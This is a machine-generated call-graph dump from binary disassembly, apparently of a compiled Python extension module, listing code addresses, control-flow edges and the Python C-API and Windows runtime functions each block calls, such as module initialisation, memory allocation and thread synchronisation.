14074->14078 14075->14074 14077 7ff81ecad5df 14076->14077 14079 7ff81ecad5d6 _Py_Dealloc 14076->14079 14080 7ff81ecad5fb 14077->14080 14081 7ff81ecad5f2 _Py_Dealloc 14077->14081 14078->14076 14079->14077 14082 7ff81ecad617 14080->14082 14083 7ff81ecad60e _Py_Dealloc 14080->14083 14081->14080 14084 7ff81ecad633 14082->14084 14085 7ff81ecad62a _Py_Dealloc 14082->14085 14083->14082 14086 7ff81ecad64f 14084->14086 14088 7ff81ecad646 _Py_Dealloc 14084->14088 14085->14084 14087 7ff81ecad66b 14086->14087 14089 7ff81ecad662 _Py_Dealloc 14086->14089 14090 7ff81ecad687 14087->14090 14091 7ff81ecad67e _Py_Dealloc 14087->14091 14088->14086 14089->14087 14092 7ff81ecad6a3 14090->14092 14093 7ff81ecad69a _Py_Dealloc 14090->14093 14091->14090 14094 7ff81ecad6bf 14092->14094 14095 7ff81ecad6b6 _Py_Dealloc 14092->14095 14093->14092 14096 7ff81ecad6db 14094->14096 14097 7ff81ecad6d2 _Py_Dealloc 14094->14097 14095->14094 14098 7ff81ecad6f7 14096->14098 14099 7ff81ecad6ee _Py_Dealloc 14096->14099 14097->14096 14100 7ff81ecad713 14098->14100 14101 7ff81ecad70a _Py_Dealloc 14098->14101 14099->14098 14102 7ff81ecad72f 14100->14102 14103 7ff81ecad726 _Py_Dealloc 14100->14103 14101->14100 14104 7ff81ecad74b 14102->14104 14105 7ff81ecad742 _Py_Dealloc 14102->14105 14103->14102 14106 7ff81ecad767 14104->14106 14107 7ff81ecad75e _Py_Dealloc 14104->14107 14105->14104 14108 7ff81ecad783 14106->14108 14110 7ff81ecad77a _Py_Dealloc 14106->14110 14107->14106 14109 7ff81ecad79f 14108->14109 14111 7ff81ecad796 _Py_Dealloc 14108->14111 14112 7ff81ecad7bb 14109->14112 14113 7ff81ecad7b2 _Py_Dealloc 14109->14113 14110->14108 14111->14109 14114 7ff81ecad7d7 14112->14114 14115 7ff81ecad7ce _Py_Dealloc 14112->14115 14113->14112 14116 7ff81ecad7f3 14114->14116 14117 7ff81ecad7ea _Py_Dealloc 14114->14117 14115->14114 14118 7ff81ecad80f 14116->14118 14120 7ff81ecad806 _Py_Dealloc 14116->14120 14117->14116 14119 7ff81ecad82b 14118->14119 14121 7ff81ecad822 _Py_Dealloc 14118->14121 14122 7ff81ecad847 14119->14122 14123 7ff81ecad83e _Py_Dealloc 14119->14123 14120->14118 14121->14119 14124 7ff81ecad863 14122->14124 14125 7ff81ecad85a _Py_Dealloc 14122->14125 14123->14122 14126 7ff81ecad87f 14124->14126 14127 7ff81ecad876 _Py_Dealloc 14124->14127 14125->14124 14128 7ff81ecad89b 14126->14128 14129 7ff81ecad892 _Py_Dealloc 14126->14129 14127->14126 14130 7ff81ecad8b7 14128->14130 14131 7ff81ecad8ae _Py_Dealloc 14128->14131 14129->14128 14132 7ff81ecad8d3 14130->14132 14133 7ff81ecad8ca _Py_Dealloc 14130->14133 14131->14130 14134 7ff81ecad8e6 _Py_Dealloc 14132->14134 14136 7ff81ecad8ef 14132->14136 14133->14132 14134->14136 14135 7ff81ecad90b 14138 7ff81ecad927 14135->14138 14139 7ff81ecad91e _Py_Dealloc 14135->14139 14136->14135 14137 7ff81ecad902 _Py_Dealloc 14136->14137 14137->14135 14140 7ff81ecad943 14138->14140 14142 7ff81ecad93a _Py_Dealloc 14138->14142 14139->14138 14141 7ff81ecad95f 14140->14141 14143 7ff81ecad956 _Py_Dealloc 14140->14143 14144 7ff81ecad97b 14141->14144 14145 7ff81ecad972 _Py_Dealloc 14141->14145 14142->14140 14143->14141 14146 7ff81ecad997 14144->14146 14147 7ff81ecad98e _Py_Dealloc 14144->14147 14145->14144 14148 7ff81ecad9b3 14146->14148 14149 7ff81ecad9aa _Py_Dealloc 14146->14149 14147->14146 14150 7ff81ecad9cf 14148->14150 14152 7ff81ecad9c6 _Py_Dealloc 14148->14152 14149->14148 14151 7ff81ecad9eb 14150->14151 14153 7ff81ecad9e2 _Py_Dealloc 14150->14153 14154 7ff81ecada07 14151->14154 14155 7ff81ecad9fe _Py_Dealloc 14151->14155 14152->14150 14153->14151 14156 7ff81ecada23 14154->14156 14157 7ff81ecada1a _Py_Dealloc 14154->14157 14155->14154 14158 7ff81ecada3f 14156->14158 14159 7ff81ecada36 _Py_Dealloc 14156->14159 14157->14156 14160 7ff81ecada5b 14158->14160 14161 7ff81ecada52 _Py_Dealloc 14158->14161 14159->14158 14162 7ff81ecada77 14160->14162 14163 7ff81ecada6e _Py_Dealloc 14160->14163 14161->14160 14164 7ff81ecada93 14162->14164 14165 7ff81ecada8a _Py_Dealloc 14162->14165 14163->14162 14166 7ff81ecadaaf 14164->14166 14167 7ff81ecadaa6 _Py_Dealloc 14164->14167 14165->14164 14168 7ff81ecadacb 14166->14168 14169 7ff81ecadac2 _Py_Dealloc 14166->14169 14167->14166 14170 7ff81ecadae7 14168->14170 14171 7ff81ecadade _Py_Dealloc 14168->14171 14169->14168 14172 7ff81ecadb03 14170->14172 14174 7ff81ecadafa _Py_Dealloc 14170->14174 14171->14170 14173 7ff81ecadb1f 14172->14173 14175 7ff81ecadb16 _Py_Dealloc 14172->14175 14176 7ff81ecadb46 14173->14176 14177 7ff81ecadb2a _Py_Dealloc 14173->14177 14174->14172 14175->14173 14178 7ff81ecadb93 PyErr_Occurred 14176->14178 14179 7ff81ecadb50 14176->14179 14177->14176 14180 7ff81ecadbb5 14178->14180 14181 7ff81ecadb9e PyErr_SetString 14178->14181 14179->14180 14182 7ff81ecadb8b _Py_Dealloc 14179->14182 14181->14180 14182->14180 14595 7ff81ec818e0 PyThreadState_Get PyInterpreterState_GetID 14596 7ff81ec8190b 14595->14596 14597 7ff81ec81938 14595->14597 14598 7ff81ec8192d 14596->14598 14600 7ff81ec8195e PyObject_GetAttrString 14596->14600 14597->14596 14599 7ff81ec8193d PyErr_SetString 14597->14599 14599->14598 14601 7ff81ec8198e PyModule_NewObject 14600->14601 14602 7ff81ec81a10 14600->14602 14603 7ff81ec819a9 14601->14603 14604 7ff81ec819a0 _Py_Dealloc 14601->14604 14603->14602 14605 7ff81ec819ae PyModule_GetDict 14603->14605 14604->14603 14606 7ff81ec819bf PyObject_GetAttrString 14605->14606 14631 7ff81ec81a01 14605->14631 14607 7ff81ec81a2e PyErr_ExceptionMatches 14606->14607 14608 7ff81ec819d7 PyDict_SetItemString 14606->14608 14612 7ff81ec81a42 PyErr_Clear 14607->14612 14607->14631 14610 7ff81ec819fc 14608->14610 14611 7ff81ec819f3 _Py_Dealloc 14608->14611 14609 7ff81ec81a07 _Py_Dealloc 14609->14602 14613 7ff81ec81a48 PyObject_GetAttrString 14610->14613 14610->14631 14611->14610 14612->14613 14614 7ff81ec81a90 PyErr_ExceptionMatches 14613->14614 14615 7ff81ec81a60 PyDict_SetItemString 14613->14615 14618 7ff81ec81aa8 PyErr_Clear 14614->14618 14614->14631 14616 7ff81ec81a7c _Py_Dealloc 14615->14616 14617 7ff81ec81a85 14615->14617 14616->14617 14619 7ff81ec81aae PyObject_GetAttrString 14617->14619 14617->14631 14618->14619 14620 7ff81ec81af6 PyErr_ExceptionMatches 14619->14620 14621 7ff81ec81ac6 PyDict_SetItemString 14619->14621 14624 7ff81ec81b0e PyErr_Clear 14620->14624 14620->14631 14622 7ff81ec81aeb 14621->14622 14623 7ff81ec81ae2 _Py_Dealloc 14621->14623 14625 7ff81ec81b14 PyObject_GetAttrString 14622->14625 14622->14631 14623->14622 14624->14625 14626 7ff81ec81b2c 14625->14626 14627 7ff81ec81b64 PyErr_ExceptionMatches 14625->14627 14628 7ff81ec81b4b 14626->14628 14629 7ff81ec81b35 PyDict_SetItemString 14626->14629 14630 7ff81ec81b7c PyErr_Clear 14627->14630 14627->14631 14628->14631 14632 7ff81ec81b51 _Py_Dealloc 14628->14632 14629->14628 14630->14602 14631->14602 14631->14609 14632->14631 11153 7ff81ecb1490 11154 7ff81ecb14a1 PyImport_ImportModule 11153->11154 11155 7ff81ecb1549 11153->11155 11156 7ff81ecb14b3 PyErr_WriteUnraisable PyErr_WarnEx 11154->11156 11160 7ff81ecb14de 11154->11160 11157 7ff81ecb14f5 11156->11157 11158 7ff81ecb14dc 11156->11158 11159 7ff81ecb150e PyImport_ImportModule 11158->11159 11161 7ff81ecb1543 PyErr_Clear 11159->11161 11162 7ff81ecb1520 11159->11162 11160->11157 11160->11159 11163 7ff81ecb1505 _Py_Dealloc 11160->11163 11161->11155 11162->11161 11164 7ff81ecb152d 11162->11164 11163->11159 11164->11155 11165 7ff81ecb1533 _Py_Dealloc 11164->11165 14186 7ff81ecb6390 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14187 7ff81def24b0 14188 7ff81def24ed 14187->14188 14195 7ff81def24e4 14187->14195 14189 7ff81def272d 14188->14189 14197 7ff81def2544 14188->14197 14190 7ff81deea870 memset 14189->14190 14193 7ff81def2723 14190->14193 14191 7ff81df4ebe0 6 API calls 14192 7ff81def27e9 14191->14192 14200 7ff81def1540 14193->14200 14195->14191 14198 7ff81deea870 memset 14197->14198 14199 7ff81deea8cb 14198->14199 14199->14193 14201 7ff81def1760 14200->14201 14202 7ff81def1592 14200->14202 14224 7ff81deec550 14201->14224 14202->14201 14207 7ff81def15dd 14202->14207 14204 7ff81def16bd 14218 7ff81deecde0 14204->14218 14206 7ff81def16b8 14206->14195 14207->14204 14208 7ff81def161a 14207->14208 14210 7ff81deed0e0 14208->14210 14211 7ff81deec550 4 API calls 14210->14211 14214 7ff81deed151 14211->14214 14212 7ff81deed2e6 14212->14206 14213 7ff81deed231 memset 14216 7ff81deed276 memmove 14213->14216 14217 7ff81deed26f 14213->14217 14214->14212 14214->14213 14215 7ff81deed20d memmove 14214->14215 14215->14213 14216->14212 14217->14216 14219 7ff81deece1e 14218->14219 14220 7ff81deec550 4 API calls 14219->14220 14223 7ff81deecf59 14220->14223 14221 7ff81deecfdb 14221->14206 14222 7ff81deecfa9 memmove 14222->14221 14223->14221 14223->14222 14226 7ff81deec61e 14224->14226 14225 7ff81deecd2a 14225->14206 14226->14225 14227 7ff81deec8ea 14226->14227 14229 7ff81deec8f3 free 14226->14229 14230 7ff81deec916 14226->14230 14228 7ff81deec922 malloc 14227->14228 14227->14230 14228->14230 14229->14227 14230->14225 14231 7ff81deecbcc memset 14230->14231 14232 7ff81deecbf5 14230->14232 14231->14232 14232->14225 14233 7ff81deecd12 memset 14232->14233 14233->14225 14532 7ff81deea230 malloc 14533 7ff81deea263 14532->14533 14534 7ff81deea269 14532->14534 14537 7ff81deea2a0 memset memset 14534->14537 14538 7ff81deea2ff 14537->14538 14539 7ff81deea28c 14538->14539 14540 7ff81deea356 memset 14538->14540 14540->14539 14633 7ff81def2db0 14634 7ff81def2ea7 14633->14634 14638 7ff81def2ef2 14633->14638 14634->14638 14646 7ff81def1d90 14634->14646 14636 7ff81df4ebe0 6 API calls 14637 7ff81def3373 14636->14637 14639 7ff81def30d8 14638->14639 14640 7ff81def3178 14638->14640 14645 7ff81def30b5 14638->14645 14641 7ff81def1540 8 API calls 14639->14641 14642 7ff81def31b1 14640->14642 14652 7ff81df2f8e0 14640->14652 14641->14645 14642->14645 14676 7ff81df303f0 14642->14676 14645->14636 14649 7ff81def1e6f 14646->14649 14651 7ff81def20d5 14646->14651 14647 7ff81df4ebe0 6 API calls 14648 7ff81def20f9 14647->14648 14648->14638 14695 7ff81def19c0 14649->14695 14651->14647 14653 7ff81df2f90c 14652->14653 14654 7ff81df2fbba 14652->14654 14653->14654 14655 7ff81df2f96f calloc 14653->14655 14656 7ff81df2f953 memset 14653->14656 14654->14642 14658 7ff81df2f97b 14655->14658 14656->14658 14658->14654 14660 7ff81df2f9bd 14658->14660 14699 7ff81dee25c0 14658->14699 14661 7ff81df2fa2f calloc 14660->14661 14662 7ff81df2fa16 memset 14660->14662 14663 7ff81df2fa3b 14661->14663 14662->14663 14665 7ff81df2fa40 14663->14665 14666 7ff81df2fa55 InitializeCriticalSection InitializeConditionVariable 14663->14666 14713 7ff81df2e450 14665->14713 14666->14665 14666->14666 14671 7ff81df2e450 3 API calls 14672 7ff81df2faf0 14671->14672 14673 7ff81df2fafd 14672->14673 14674 7ff81df2fb02 EnterCriticalSection LeaveCriticalSection 14672->14674 14675 7ff81df2fb18 memset InitializeCriticalSection InitializeConditionVariable InitializeCriticalSection InitializeConditionVariable 14673->14675 14674->14675 14675->14654 14677 7ff81df3041c 14676->14677 14681 7ff81df30421 14676->14681 14752 7ff81df30010 14677->14752 14679 7ff81df3053b 14685 7ff81df305e7 memset 14679->14685 14688 7ff81df3066c 14679->14688 14680 7ff81df30533 14785 7ff81df2fbf0 14680->14785 14681->14679 14681->14680 14682 7ff81df304a0 EnterCriticalSection 14681->14682 14686 7ff81df304e0 SleepConditionVariableCS 14681->14686 14694 7ff81df3067f 14681->14694 14682->14681 14684 7ff81df3050c LeaveCriticalSection 14682->14684 14684->14680 14684->14682 14687 7ff81def1d90 7 API calls 14685->14687 14686->14684 14686->14686 14687->14688 14689 7ff81df30883 EnterCriticalSection LeaveCriticalSection 14688->14689 14688->14694 14690 7ff81df308a6 14689->14690 14691 7ff81df30923 14690->14691 14692 7ff81df3092f free 14690->14692 14690->14694 14693 7ff81df3095b malloc 14691->14693 14691->14694 14692->14691 14693->14694 14694->14645 14696 7ff81def1a0a 14695->14696 14698 7ff81def1a4a 14695->14698 14697 7ff81def1a40 memmove 14696->14697 14696->14698 14697->14698 14698->14651 14700 7ff81dee25de 14699->14700 14712 7ff81dee2706 14699->14712 14701 7ff81dee25f7 memset 14700->14701 14702 7ff81dee2613 calloc 14700->14702 14703 7ff81dee2621 14701->14703 14702->14703 14705 7ff81dee2656 memset 14703->14705 14706 7ff81dee266f calloc 14703->14706 14703->14712 14707 7ff81dee267d InitializeCriticalSection InitializeConditionVariable InitializeConditionVariable 14705->14707 14706->14707 14708 7ff81dee26df memset 14707->14708 14709 7ff81dee26f8 calloc 14707->14709 14708->14712 14709->14712 14712->14660 14714 7ff81df2e48a memset 14713->14714 14715 7ff81df2e4a3 calloc 14713->14715 14716 7ff81df2e4b1 14714->14716 14715->14716 14718 7ff81df2e4ba InitializeCriticalSection 14716->14718 14719 7ff81df2e4b6 14716->14719 14718->14719 14720 7ff81df2e960 14719->14720 14721 7ff81df2e99d memset 14720->14721 14722 7ff81df2e9b6 calloc 14720->14722 14723 7ff81df2e9c4 14721->14723 14722->14723 14725 7ff81df2e9c9 InitializeCriticalSection 14723->14725 14727 7ff81df2ea13 14723->14727 14726 7ff81df2ea02 14725->14726 14726->14727 14729 7ff81df2e8e0 14726->14729 14727->14671 14730 7ff81df2e918 DeleteCriticalSection 14729->14730 14731 7ff81df2e8f5 14729->14731 14732 7ff81df2e94a free 14730->14732 14733 7ff81df2e93a 14730->14733 14735 7ff81df2e913 14731->14735 14736 7ff81deea550 14731->14736 14733->14732 14735->14730 14737 7ff81deea5ce 14736->14737 14738 7ff81deea55e 14736->14738 14737->14731 14739 7ff81deea568 14738->14739 14740 7ff81deea594 14738->14740 14741 7ff81deea587 14738->14741 14739->14731 14742 7ff81deea4b0 free 14740->14742 14748 7ff81deea4b0 14741->14748 14744 7ff81deea599 14742->14744 14746 7ff81deea5c5 free 14744->14746 14747 7ff81deea5b3 14744->14747 14746->14737 14747->14731 14749 7ff81deea4be 14748->14749 14750 7ff81deea549 14749->14750 14751 7ff81deea53d free 14749->14751 14750->14731 14751->14750 14753 7ff81df30032 EnterCriticalSection 14752->14753 14779 7ff81df30266 14752->14779 14754 7ff81df30060 14753->14754 14755 7ff81df30047 14753->14755 14756 7ff81df3009f calloc 14754->14756 14757 7ff81df30086 memset 14754->14757 14758 7ff81df30151 WakeAllConditionVariable LeaveCriticalSection 14755->14758 14759 7ff81df300ad 14756->14759 14757->14759 14760 7ff81df30175 14758->14760 14758->14779 14759->14755 14761 7ff81df300bb memmove 14759->14761 14765 7ff81df301cd 14760->14765 14769 7ff81df301b7 DeleteCriticalSection 14760->14769 14771 7ff81df301d7 14760->14771 14772 7ff81df302a0 14760->14772 14761->14755 14763 7ff81df300eb 14761->14763 14763->14755 14764 7ff81df30101 free 14763->14764 14764->14755 14770 7ff81df301f1 free 14765->14770 14765->14771 14766 7ff81df3023a memset 14768 7ff81df30261 14766->14768 14767 7ff81df30253 calloc 14767->14768 14768->14772 14774 7ff81df30280 InitializeCriticalSection InitializeConditionVariable 14768->14774 14768->14779 14769->14765 14769->14769 14770->14771 14771->14766 14771->14767 14775 7ff81df2e8e0 4 API calls 14772->14775 14778 7ff81df302e4 14772->14778 14772->14779 14774->14772 14774->14774 14776 7ff81df30303 14775->14776 14777 7ff81df2e960 7 API calls 14776->14777 14777->14778 14778->14779 14793 7ff81df2e500 14778->14793 14779->14681 14782 7ff81df2e450 3 API calls 14783 7ff81df30389 14782->14783 14783->14779 14784 7ff81df30391 EnterCriticalSection LeaveCriticalSection 14783->14784 14784->14779 14791 7ff81df2fc10 14785->14791 14786 7ff81df2fc62 EnterCriticalSection 14789 7ff81df2fc91 LeaveCriticalSection 14786->14789 14790 7ff81df2fc76 LeaveCriticalSection 14786->14790 14787 7ff81df2fcc0 memset 14788 7ff81df2fd17 14787->14788 14787->14791 14788->14679 14789->14791 14792 7ff81df2fcb7 free 14789->14792 14790->14787 14791->14786 14791->14787 14792->14787 14794 7ff81df2e5a9 14793->14794 14799 7ff81df2e509 14793->14799 14794->14782 14795 7ff81df2e569 DeleteCriticalSection 14796 7ff81df2e59b free 14795->14796 14797 7ff81df2e58b 14795->14797 14796->14794 14797->14796 14798 7ff81df2e55c free 14798->14799 14799->14795 14799->14798 14234 7ff81ec52594 PyType_GetModuleByDef 14235 7ff81ec525cb PyType_GetModuleByDef 14234->14235 14236 7ff81ec52667 14234->14236 14235->14236 14237 7ff81ec525f5 PyType_GetModuleByDef 14235->14237 14236->14237 14238 7ff81ec52673 _PyArg_NoPositional 14236->14238 14239 7ff81ec5260e PyType_GetModuleByDef 14237->14239 14240 7ff81ec52631 14237->14240 14238->14237 14241 7ff81ec52652 14238->14241 14239->14240 14242 7ff81ec5264a 14239->14242 14240->14242 14243 7ff81ec52636 _PyArg_NoKeywords 14240->14243 14245 7ff81ec52690 14242->14245 14243->14241 14243->14242 14246 7ff81ec5269e 14245->14246 14247 7ff81ec52711 14246->14247 14248 7ff81ec526a6 PyList_New PyThread_allocate_lock 14246->14248 14247->14241 14249 7ff81ec526fb 14248->14249 14250 7ff81ec526d1 14248->14250 14249->14247 14253 7ff81ec52708 _Py_Dealloc 14249->14253 14251 7ff81ec526d7 _Py_Dealloc 14250->14251 14252 7ff81ec526e0 PyErr_SetString 14250->14252 14251->14252 14252->14247 14253->14247 14800 7ff81df2e840 14801 7ff81df2e8d0 14800->14801 14802 7ff81df2e856 EnterCriticalSection 14800->14802 14803 7ff81df2e889 LeaveCriticalSection 14802->14803 14804 7ff81df2e867 LeaveCriticalSection 14802->14804 14803->14801 14805 7ff81df2e8ab 14803->14805 14806 7ff81df2e8ca free 14805->14806 14807 7ff81df2e8b5 14805->14807 14806->14801 14808 7ff81ec71090 PyModule_AddIntConstant 14254 7ff81ec81b90 14255 7ff81ec81bba 14254->14255 14256 7ff81ec81be7 Py_GetVersion PyOS_snprintf 14254->14256 14257 7ff81ec81bbf 14255->14257 14258 7ff81ec81bc6 PyErr_SetString 14255->14258 14261 7ff81ec81c42 14256->14261 14434 7ff81ec82c80 14257->14434 14258->14257 14260 7ff81ec81c6c PyTuple_New 14263 7ff81ec81d4b PyBytes_FromStringAndSize 14260->14263 14296 7ff81ec81c84 14260->14296 14261->14260 14265 7ff81ec81cf2 PyOS_snprintf PyErr_WarnEx 14261->14265 14264 7ff81ec81d70 PyUnicode_FromStringAndSize 14263->14264 14263->14296 14266 7ff81ec81d95 PyModule_GetDict 14264->14266 14264->14296 14265->14260 14265->14296 14269 7ff81ec81dbe PyImport_AddModule 14266->14269 14266->14296 14267 7ff81ec8224f PyErr_Occurred 14267->14257 14270 7ff81ec8225a PyErr_SetString 14267->14270 14268 7ff81ec8220c 14271 7ff81ec8222a 14268->14271 14387 7ff81ec82840 PyThreadState_Get 14268->14387 14272 7ff81ec81deb PyImport_AddModule 14269->14272 14269->14296 14270->14257 14271->14257 14275 7ff81ec82247 _Py_Dealloc 14271->14275 14273 7ff81ec81e11 PyObject_SetAttrString 14272->14273 14272->14296 14281 7ff81ec81e3d 14273->14281 14273->14296 14275->14257 14276 7ff81ec81ec6 14277 7ff81ec81ecf PyObject_SetAttr 14276->14277 14278 7ff81ec81f02 PyImport_GetModuleDict 14276->14278 14277->14278 14277->14296 14279 7ff81ec81f1a PyDict_GetItemString 14278->14279 14278->14296 14282 7ff81ec81f4c 14279->14282 14283 7ff81ec81f2b PyDict_SetItemString 14279->14283 14280 7ff81ec81e8f PyBytes_FromStringAndSize 14280->14281 14281->14276 14281->14280 14284 7ff81ec81e64 PyUnicode_InternFromString 14281->14284 14287 7ff81ec81e7c PyUnicode_Decode 14281->14287 14288 7ff81ec81e87 PyUnicode_FromStringAndSize 14281->14288 14289 7ff81ec81eaf PyObject_Hash 14281->14289 14281->14296 14285 7ff81ec81f6d 14282->14285 14286 7ff81ec81f72 PyObject_GetAttr 14282->14286 14283->14282 14283->14296 14284->14281 14290 7ff81ec81fab PyTuple_Pack 14285->14290 14291 7ff81ec81f80 PyErr_Format 14285->14291 14286->14285 14287->14281 14288->14281 14289->14281 14289->14296 14292 7ff81ec8201e 14290->14292 14290->14296 14291->14296 14324 7ff81ec81000 PyErr_Fetch PyDict_New 14292->14324 14295 7ff81ec82033 PyImport_ImportModule 14295->14296 14297 7ff81ec8204c 14295->14297 14296->14267 14296->14268 14375 7ff81ec826a0 PyObject_GetAttrString 14297->14375 14300 7ff81ec821e1 14300->14296 14301 7ff81ec821e6 _Py_Dealloc 14300->14301 14301->14296 14302 7ff81ec8207f PyImport_ImportModule 14302->14296 14304 7ff81ec82098 14302->14304 14303 7ff81ec82076 _Py_Dealloc 14303->14302 14305 7ff81ec826a0 14 API calls 14304->14305 14306 7ff81ec820ad 14305->14306 14306->14300 14307 7ff81ec820cb PyImport_ImportModule 14306->14307 14308 7ff81ec820c2 _Py_Dealloc 14306->14308 14307->14296 14309 7ff81ec820e4 14307->14309 14308->14307 14310 7ff81ec826a0 14 API calls 14309->14310 14311 7ff81ec820f9 14310->14311 14311->14300 14312 7ff81ec82109 14311->14312 14313 7ff81ec8210e _Py_Dealloc 14312->14313 14314 7ff81ec82117 PyCMethod_New 14312->14314 14313->14314 14314->14296 14315 7ff81ec82145 PyDict_SetItem 14314->14315 14316 7ff81ec8216c 14315->14316 14317 7ff81ec82160 14315->14317 14318 7ff81ec8217b PyDict_New 14316->14318 14319 7ff81ec82172 _Py_Dealloc 14316->14319 14317->14296 14320 7ff81ec821be _Py_Dealloc 14317->14320 14318->14296 14321 7ff81ec82190 PyDict_SetItem 14318->14321 14319->14318 14320->14296 14321->14317 14322 7ff81ec821c9 14321->14322 14322->14257 14323 7ff81ec821d3 _Py_Dealloc 14322->14323 14323->14257 14325 7ff81ec8142a 14324->14325 14326 7ff81ec810a7 PyLong_FromLong 14324->14326 14327 7ff81ec8144a 14325->14327 14328 7ff81ec81437 PyErr_Restore 14325->14328 14329 7ff81ec810c1 PyDict_SetItemString 14326->14329 14374 7ff81ec81350 14326->14374 14327->14295 14327->14296 14328->14327 14332 7ff81ec810dc PyLong_FromLong 14329->14332 14329->14374 14330 7ff81ec8136e _Py_Dealloc 14331 7ff81ec81377 14330->14331 14333 7ff81ec81393 14331->14333 14335 7ff81ec8138a _Py_Dealloc 14331->14335 14334 7ff81ec810f5 PyDict_SetItemString 14332->14334 14332->14374 14337 7ff81ec813af 14333->14337 14339 7ff81ec813a6 _Py_Dealloc 14333->14339 14336 7ff81ec81110 PyLong_FromLong 14334->14336 14334->14374 14335->14333 14338 7ff81ec81124 PyDict_SetItemString 14336->14338 14336->14374 14340 7ff81ec813c4 14337->14340 14343 7ff81ec813bb _Py_Dealloc 14337->14343 14342 7ff81ec8113f PyLong_FromLong 14338->14342 14338->14374 14339->14337 14341 7ff81ec813d9 14340->14341 14344 7ff81ec813d0 _Py_Dealloc 14340->14344 14346 7ff81ec813e4 _Py_Dealloc 14341->14346 14347 7ff81ec813ed 14341->14347 14345 7ff81ec81154 PyDict_SetItemString 14342->14345 14342->14374 14343->14340 14344->14341 14349 7ff81ec8116f PyLong_FromLong 14345->14349 14345->14374 14346->14347 14348 7ff81ec81401 14347->14348 14350 7ff81ec813f8 _Py_Dealloc 14347->14350 14351 7ff81ec81415 14348->14351 14354 7ff81ec8140c _Py_Dealloc 14348->14354 14352 7ff81ec81183 PyDict_SetItemString 14349->14352 14349->14374 14350->14348 14351->14325 14356 7ff81ec81421 _Py_Dealloc 14351->14356 14353 7ff81ec8119e PyLong_FromLong 14352->14353 14352->14374 14355 7ff81ec811b0 PyDict_SetItemString 14353->14355 14353->14374 14354->14351 14357 7ff81ec811cb PyDict_SetItemString 14355->14357 14355->14374 14356->14325 14358 7ff81ec811eb PyDict_SetItemString 14357->14358 14357->14374 14359 7ff81ec8120b PyDict_SetItemString 14358->14359 14358->14374 14360 7ff81ec8122b PyDict_SetItemString 14359->14360 14359->14374 14361 7ff81ec8124b PyDict_SetItemString 14360->14361 14360->14374 14362 7ff81ec8126b PyDict_SetItemString 14361->14362 14361->14374 14363 7ff81ec8128b PyDict_SetItemString 14362->14363 14362->14374 14364 7ff81ec812ab PyUnicode_AsUTF8AndSize 14363->14364 14363->14374 14365 7ff81ec812cc PyUnicode_AsUTF8AndSize 14364->14365 14364->14374 14366 7ff81ec812e5 PyCode_NewEmpty 14365->14366 14365->14374 14367 7ff81ec81302 PyObject_GetAttrString 14366->14367 14366->14374 14368 7ff81ec8131a PyTuple_New 14367->14368 14369 7ff81ec81357 14367->14369 14368->14369 14371 7ff81ec8132a PyObject_Call 14368->14371 14370 7ff81ec8135d _Py_Dealloc 14369->14370 14369->14374 14370->14374 14371->14369 14372 7ff81ec81341 14371->14372 14373 7ff81ec81347 _Py_Dealloc 14372->14373 14372->14374 14373->14374 14374->14330 14374->14331 14376 7ff81ec826d8 14375->14376 14377 7ff81ec82790 14375->14377 14378 7ff81ec82708 14376->14378 14379 7ff81ec826e5 PyErr_Format 14376->14379 14383 7ff81ec82c80 8 API calls 14377->14383 14381 7ff81ec8273e 14378->14381 14382 7ff81ec82711 PyErr_Format 14378->14382 14380 7ff81ec82781 14379->14380 14380->14377 14385 7ff81ec82787 _Py_Dealloc 14380->14385 14381->14377 14384 7ff81ec82740 PyOS_snprintf PyErr_WarnEx 14381->14384 14382->14380 14386 7ff81ec82061 14383->14386 14384->14377 14384->14380 14385->14377 14386->14300 14386->14302 14386->14303 14388 7ff81ec8287c 14387->14388 14416 7ff81ec829bc 14387->14416 14389 7ff81ec82889 PyErr_Fetch _PyObject_GetDictPtr 14388->14389 14388->14416 14390 7ff81ec828fd 14389->14390 14391 7ff81ec828b3 14389->14391 14395 7ff81ec8291b 14390->14395 14396 7ff81ec82920 PyObject_GetAttr 14390->14396 14393 7ff81ec828cf _PyDict_GetItem_KnownHash 14391->14393 14394 7ff81ec828c3 14391->14394 14392 7ff81ec82a04 PyErr_Fetch 14397 7ff81ec82a1d PyUnicode_FromFormat 14392->14397 14398 7ff81ec82a61 PyCode_NewEmpty 14392->14398 14393->14394 14409 7ff81ec8295d 14394->14409 14410 7ff81ec82986 PyObject_SetAttr 14394->14410 14407 7ff81ec8292e PyObject_Not 14395->14407 14408 7ff81ec82980 PyErr_Clear 14395->14408 14396->14395 14401 7ff81ec82a3f PyUnicode_AsUTF8 14397->14401 14402 7ff81ec82a8c 14397->14402 14399 7ff81ec82a78 14398->14399 14400 7ff81ec82a87 14398->14400 14399->14400 14404 7ff81ec82a7e _Py_Dealloc 14399->14404 14400->14402 14405 7ff81ec82ad5 PyErr_Restore 14400->14405 14401->14398 14403 7ff81ec82a50 14401->14403 14406 7ff81ec82aa2 14402->14406 14414 7ff81ec82a9c _Py_Dealloc 14402->14414 14403->14402 14412 7ff81ec82a56 _Py_Dealloc 14403->14412 14404->14400 14411 7ff81ec82aee 14405->14411 14418 7ff81ec82ab2 _Py_Dealloc 14406->14418 14430 7ff81ec82ab8 14406->14430 14407->14394 14415 7ff81ec8294f _Py_Dealloc 14407->14415 14408->14410 14413 7ff81ec829a3 PyErr_Restore 14409->14413 14417 7ff81ec8297c 14409->14417 14421 7ff81ec8296f PyObject_Not 14409->14421 14410->14413 14422 7ff81ec82bfb PyFrame_New 14411->14422 14423 7ff81ec82b09 PyMem_Malloc 14411->14423 14428 7ff81ec82b43 14411->14428 14412->14402 14413->14416 14414->14406 14415->14394 14416->14392 14419 7ff81ec829fa 14416->14419 14417->14413 14418->14430 14419->14422 14420 7ff81ec82c50 14420->14271 14421->14413 14421->14417 14424 7ff81ec82c1b PyTraceBack_Here 14422->14424 14425 7ff81ec82c28 14422->14425 14423->14419 14423->14422 14424->14425 14427 7ff81ec82c33 _Py_Dealloc 14425->14427 14425->14430 14426 7ff81ec82c4a _Py_Dealloc 14426->14420 14427->14430 14429 7ff81ec82b86 14428->14429 14431 7ff81ec82b69 14428->14431 14429->14419 14432 7ff81ec82b90 PyMem_Realloc 14429->14432 14430->14420 14430->14426 14431->14422 14433 7ff81ec82b7b _Py_Dealloc 14431->14433 14432->14419 14432->14422 14433->14422 14435 7ff81ec82c89 14434->14435 14436 7ff81ec83034 IsProcessorFeaturePresent 14435->14436 14437 7ff81ec822a9 14435->14437 14438 7ff81ec8304c 14436->14438 14443 7ff81ec83108 RtlCaptureContext 14438->14443 14444 7ff81ec83122 